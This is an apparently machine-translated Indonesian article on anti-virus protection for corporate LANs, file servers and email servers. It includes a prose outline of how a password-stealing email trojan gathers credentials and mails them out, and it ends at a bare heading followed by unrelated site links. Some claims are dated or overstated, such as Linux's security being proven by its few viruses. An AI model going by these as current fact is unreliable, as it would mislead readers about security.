Keamanan informasi dipahami sebagai keamanan informasi dan infrastruktur pendukungnya dari pengaruh yang tidak disengaja atau berbahaya, yang dapat mengakibatkan kerusakan pada informasi itu sendiri, pemiliknya, atau infrastruktur pendukungnya. Tugas keamanan informasi dikurangi untuk meminimalkan kerusakan, serta memprediksi dan mencegah dampak tersebut.

Bagi kebanyakan organisasi, melindungi sumber daya jaringan dari akses yang tidak sah menjadi salah satu masalah yang paling mendesak. Perhatian khusus adalah kenyataan bahwa Internet sekarang banyak digunakan untuk mengangkut dan menyimpan berbagai data dan informasi rahasia perusahaan.

Tugas melindungi informasi sangat relevan bagi pemilik basis data informasi online, penerbit jurnal elektronik, dll.

Sampai saat ini telah banyak dibuat program antivirus untuk melawan virus.Program antivirus (antivirus) pada mulanya adalah program untuk mendeteksi dan mengobati program yang terinfeksi virus komputer, serta untuk mencegah terinfeksinya file yang terkena virus (misalnya, melalui vaksinasi). Banyak antivirus modern juga dapat mendeteksi dan menghapus Trojan dan program jahat lainnya. Perangkat lunak antivirus terdiri dari program komputer yang mencoba mendeteksi, mencegah, dan menghapus virus komputer dan program jahat lainnya. Perangkat lunak antivirus membantu melindungi komputer Anda dari virus, worm, Trojan, dan malware lain yang dikenal yang dapat mogok. Server file dan email sekarang menjadi alat utama untuk manajemen data. Menyimpan, bertukar, dan mentransmisikan data adalah tugas utama dalam manajemen seperti itu, tetapi itu tidak mungkin tanpa akses mudah ke informasi, integrasi data, dan stabilitas sistem. File server adalah salah satu sumber daya jaringan yang paling rentan. Jika terjadi infeksi atau malfungsi, akses ke sumber daya jaringan lain mungkin dibatasi. Sebuah file yang terinfeksi tunggal dapat menyebabkan infeksi sejumlah besar data, hilangnya integrasi data dan malfungsi sistem. Risiko seperti itu adalah alasannya harga tinggi produk untuk mengelola server dan sumber daya jaringan. Server file "Publik" dan konferensi elektronik adalah salah satu sumber utama penyebaran virus. Hampir setiap minggu, sebuah pesan diterima bahwa seorang pengguna telah menginfeksi komputernya dengan virus yang telah dihapus dari BBS, server ftp atau dari beberapa konferensi elektronik. Pada saat yang sama, file yang sering terinfeksi "diletakkan" oleh pembuat virus di beberapa BBS / ftp atau dikirim ke beberapa konferensi secara bersamaan, dan file-file ini disamarkan sebagai versi baru dari beberapa perangkat lunak (kadang-kadang - di bawah versi antivirus baru) . Dalam hal penyebaran massal virus ke server file ftp / BBS, ribuan komputer dapat terpengaruh hampir secara bersamaan, tetapi dalam kebanyakan kasus virus DOS atau Windows "ditanam", penyebarannya dalam kondisi modern jauh lebih rendah daripada yaitu virus makro. Karena itu, insiden semacam itu hampir tidak pernah berakhir dengan epidemi massal, yang tidak dapat dikatakan tentang virus makro. 2 Perangkat lunak antivirus untuk server LAN Masalah perlindungan anti-virus yang efektif saat ini lebih relevan daripada sebelumnya di sektor korporat dan di antara pengguna pribadi, namun, tidak seperti yang terakhir, masalah dan tugas yang dihadapi perusahaan jauh lebih serius dan memerlukan solusi dari tingkat yang berbeda. Administrator sistem informasi perusahaan harus menginstal alat antivirus, mengonfigurasinya dan mengonfigurasi kebijakan pembaruan, dan memastikan bahwa antivirus terus-menerus diaktifkan di ratusan atau bahkan ribuan mesin - dan seringkali mereka harus melakukan semua ini secara manual. Jaringan lokal adalah salah satu sumber utama virus. Jika Anda tidak mengambil tindakan perlindungan yang diperlukan, workstation yang terinfeksi menginfeksi satu atau lebih file layanan di server saat memasuki jaringan (dalam kasus Novell NetWare, LOGIN.COM). Hari berikutnya, pengguna meluncurkan file yang terinfeksi ketika mereka masuk ke jaringan. Alih-alih file layanan LOGIN.COM, ada juga berbagai perangkat lunak yang diinstal di server, templat dokumen standar, atau tabel Excel yang digunakan di perusahaan.

Bahaya infeksi jaringan komputer adalah nyata untuk perusahaan mana pun, tetapi epidemi virus dapat membuat perkembangan nyata di jaringan lokal kompleks ekonomi dan industri besar dengan infrastruktur yang luas secara geografis. Jaringan komputer mereka, sebagai suatu peraturan, dibuat secara bertahap, menggunakan berbagai perangkat keras dan perangkat lunak. Jelas, untuk perusahaan seperti itu, masalah perlindungan anti-virus menjadi sangat sulit, tidak hanya secara teknis, tetapi juga dalam hal keuangan.

Pada saat yang sama, solusi untuk masalah ini dicapai melalui kombinasi langkah-langkah organisasi dan solusi perangkat lunak dan perangkat keras. Pendekatan ini tidak memerlukan biaya teknis dan finansial yang besar, dan dapat digunakan untuk perlindungan anti-virus yang komprehensif dari jaringan lokal perusahaan mana pun.

Sistem perlindungan anti-virus semacam itu dapat dibangun berdasarkan prinsip-prinsip berikut:

Prinsip penerapan kebijakan teknis terpadu ketika membenarkan pilihan produk anti-virus untuk berbagai segmen jaringan lokal;

Prinsip kelengkapan cakupan seluruh jaringan lokal organisasi oleh sistem perlindungan anti-virus;

Prinsip kontrol berkelanjutan dari jaringan lokal suatu perusahaan, untuk mendeteksi infeksi komputer secara tepat waktu;

Prinsip manajemen terpusat perlindungan anti-virus;

Prinsip penerapan kebijakan teknis terpadu menyediakan penggunaan hanya perangkat lunak anti-virus yang direkomendasikan oleh divisi perlindungan anti-virus perusahaan di semua segmen jaringan lokal. Kebijakan ini bersifat jangka panjang, disetujui oleh manajemen perusahaan dan merupakan dasar untuk perencanaan biaya yang ditargetkan dan berjangka panjang untuk pembelian produk perangkat lunak anti-virus dan pembaruannya lebih lanjut.

Prinsip kelengkapan cakupan oleh sistem perlindungan anti-virus dari jaringan lokal menyediakan pengenalan bertahap perangkat lunak perlindungan anti-virus ke dalam jaringan sampai kejenuhan lengkap dalam kombinasi dengan langkah-langkah organisasi dan rezim perlindungan informasi.

Prinsip pemantauan terus menerus dari keadaan antivirus jaringan lokal menyiratkan organisasi perlindungannya, yang memberikan kemampuan konstan untuk memantau keadaan jaringan untuk mendeteksi virus.

Prinsip manajemen terpusat perlindungan anti-virus menyediakan pengelolaan sistem dari satu otoritas menggunakan perangkat keras dan perangkat lunak. Badan inilah yang mengatur kontrol terpusat di jaringan, menerima data kontrol atau laporan pengguna dari tempat kerja mereka tentang deteksi virus dan memastikan implementasinya. keputusan yang diambil untuk mengelola sistem perlindungan anti-virus Perlindungan anti-virus dari jaringan lokal organisasi besar adalah masalah kompleks yang tidak terbatas pada instalasi sederhana produk anti-virus. Sebagai aturan, diperlukan untuk membuat subsistem terpisah. Dalam istilah teknis, ketika memecahkan masalah ini, perhatian khusus harus diberikan untuk menguji semua perangkat lunak anti-virus yang baru dibeli, serta menginstal paket anti-virus di server surat. 3 Perangkat lunak antivirus untuk server email

Jika pada awal perkembangan teknologi komputer saluran utama penyebaran virus adalah pertukaran file program melalui floppy disk, hari ini telapak tangan milik e-mail. Email adalah alat yang nyaman dan sangat diperlukan komunikasi bisnis... Namun, sebagian besar virus dan spam disebarkan melalui email, yang dapat menjadi saluran kebocoran data rahasia. Setiap hari, jutaan dan jutaan pesan ditransmisikan melalui salurannya, dan banyak dari pesan ini terinfeksi virus.

Sayangnya, file lampiran yang dikirim dengan pesan email juga bisa sangat berbahaya bagi kesehatan komputer Anda. Apa bahaya dari file lampiran? Seperti file, pengguna dapat dikirim virus atau Trojan horse atau dokumen dalam format Microsoft Office (* .doc, * .xls) terinfeksi virus komputer. Dengan menjalankan program yang dihasilkan untuk dieksekusi atau membuka dokumen untuk dilihat, pengguna dapat menginisiasi virus atau menginstal program Trojan di komputernya. Selain itu, karena pengaturan program email yang salah atau kesalahan di dalamnya, file lampiran dapat terbuka secara otomatis saat melihat konten pesan yang diterima. Dalam hal ini, jika Anda tidak mengambil tindakan perlindungan apa pun, akan ada waktu bagi virus atau malware lain untuk masuk ke komputer Anda. Upaya lain untuk menembus komputer Anda melalui email dimungkinkan. Misalnya, mereka dapat mengirim pesan dalam bentuk dokumen HTML di mana kontrol Trojan ActiveX tertanam. Setelah membuka pesan seperti itu, Anda dapat mengunduh elemen ini ke komputer Anda, setelah itu ia akan segera mulai melakukan tugasnya.E-mail trojan - Trojan yang memungkinkan Anda untuk "menarik" kata sandi dan informasi lain dari file komputer Anda dan mengirimkannya melalui email ke pemilik. Ini bisa berupa login dan kata sandi Internet penyedia, kata sandi dari kotak surat, kata sandi ICQ dan IRC, dll. Untuk mengirim surat kepada pemilik melalui surat, trojan menghubungi server surat situs menggunakan protokol SMTP (misalnya, di smtp.mail.ru). Setelah mengumpulkan data yang diperlukan, Trojan akan memeriksa apakah data telah dikirim. Jika tidak, data dikirim dan disimpan dalam register. Jika sudah dikirim, maka surat sebelumnya dikeluarkan dari register, dan dibandingkan dengan yang sekarang. Jika ada perubahan informasi (muncul data baru), maka surat itu dikirim, dan data baru tentang kata sandi dicatat dalam register. Singkatnya, jenis Trojan ini hanya mengumpulkan informasi, dan korban bahkan mungkin tidak menebak bahwa kata sandinya sudah diketahui oleh seseorang.Arsip dari Trojan semacam itu biasanya berisi 4 file: editor server (konfigurator), server Trojan, file packer (gluer), manual untuk digunakan Sebagai hasil dari pekerjaan, data berikut dapat ditentukan: 1) alamat IP komputer korban; 2) informasi terperinci tentang sistem (nama komputer dan nama pengguna, Versi Windows , modem, dll.); 3) semua kata sandi yang di-cache; 4) semua pengaturan untuk koneksi telepon, termasuk nomor telepon, login dan kata sandi; 5) kata sandi dari ICQ; 6) jumlah situs yang terakhir dikunjungi. Selain tindakan administratif murni , untuk memerangi virus dan program jahat lainnya, Anda harus menggunakan perangkat lunak antivirus khusus (antivirus).Untuk melindungi dari virus yang menyebar melalui email, Anda dapat menginstal antivirus di komputer pengirim dan penerima. Namun, perlindungan ini seringkali tidak mencukupi. Antivirus konvensional yang diinstal pada komputer pengguna Internet dirancang untuk memindai file dan tidak selalu tahu cara menganalisis lalu lintas data email. Jika antivirus tidak secara otomatis memindai semua file yang dibuka, maka virus atau Trojan horse dapat dengan mudah menembus perlindungan ke disk komputer. Selain itu, efektivitas antivirus sangat tergantung pada kepatuhan terhadap aturan penggunaannya: itu diperlukan untuk memperbarui basis data antivirus secara berkala, menggunakan pengaturan pemindai antivirus yang benar, dll. Sayangnya, banyak pemilik komputer tidak tahu cara menggunakan perangkat lunak antivirus dengan benar atau tidak memperbarui basis data anti-virus, yang pasti mengarah pada infeksi virus.Memahami urgensi masalah penyebaran virus melalui email, banyak perusahaan menawarkan antivirus khusus program untuk melindungi server email. Antivirus semacam itu menganalisis aliran data yang melewati server email, mencegah transmisi pesan dengan file lampiran yang terinfeksi. Ada solusi lain - menghubungkan ke server surat antivirus konvensional yang dirancang untuk memindai file Perlindungan antivirus server surat SMTP dan POP3 jauh lebih efektif daripada perlindungan antivirus komputer pengguna. Sebagai aturan, administrator berpengalaman mengonfigurasi antivirus di server, yang tidak akan membuat kesalahan saat mengatur dan, terlebih lagi, akan mengaktifkan mode pembaruan basis data otomatis melalui Internet. Pengguna server SMTP dan POP3 yang aman tidak perlu khawatir tentang saluran distribusi virus utama - mereka akan menerima pesan yang telah dibersihkan dari virus Tindakan yang diambil oleh server email saat mengirim dan menerima pesan yang terinfeksi bergantung pada pengaturan antivirus dan server surat itu sendiri. Misalnya, ketika pengirim mencoba mengirim pesan dengan file yang terinfeksi, server email SMTP yang aman akan menolaknya, dan program email akan menampilkan pesan peringatan. Jika seseorang mengirim email dengan lampiran file yang terinfeksi, maka saat menggunakan server POP3 yang aman, hanya pesan tentang virus yang akan dikirim.Meskipun platform Microsoft Windows semakin populer, saat ini sebagian besar server Internet menjalankan sistem operasi Linux .FreeBSD dan sistem mirip UNIX yang serupa. Keuntungan utama dari Linux adalah biaya akuisisi yang sangat rendah. Siapa pun dapat mengunduh distribusi Linux melalui Internet dan menginstalnya di sejumlah komputer. Distribusi ini memiliki semua yang Anda butuhkan untuk membuat situs Internet, termasuk server email. Keunggulan lain dari Linux dan sistem operasi serupa harus dicatat keterbukaan, ketersediaan kode sumber, kehadiran komunitas besar pengembang sukarelawan yang siap membantu di dalam situasi sulit, remote control sederhana dengan konsol teks, dll. Hanya beberapa lusin virus yang dibuat untuk OS seri ini, yang menunjukkan keamanannya yang tinggi.

4 Kaspersky Anti-Virus

Tampilan

Ulasan buku
Ulasan buku "" Leonid Maslovsky Penulis Leonid Maslovsky
Bunga dan karakter favoritmu
Bunga dan karakter favoritmu
Lembaga penelitian pembuatan kapal dan senjata angkatan laut nii kiv navy
Lembaga penelitian pembuatan kapal dan senjata angkatan laut nii kiv navy
Bagaimana cara menghitung waktu terbaik untuk mengandung anak laki-laki Horoskop selama satu tahun untuk pembuahan
Bagaimana cara menghitung waktu terbaik untuk mengandung anak laki-laki Horoskop selama satu tahun untuk pembuahan
Mengapa Inggris disebut
Mengapa Inggris disebut "England", "Britania Raya", "Foggy Albion" dan "Workshop of the World. Apa pulau yang disebut" Foggy Albion "?
Kubis untuk musim dingin dalam toples di bawah tutup besi
Kubis untuk musim dingin dalam toples di bawah tutup besi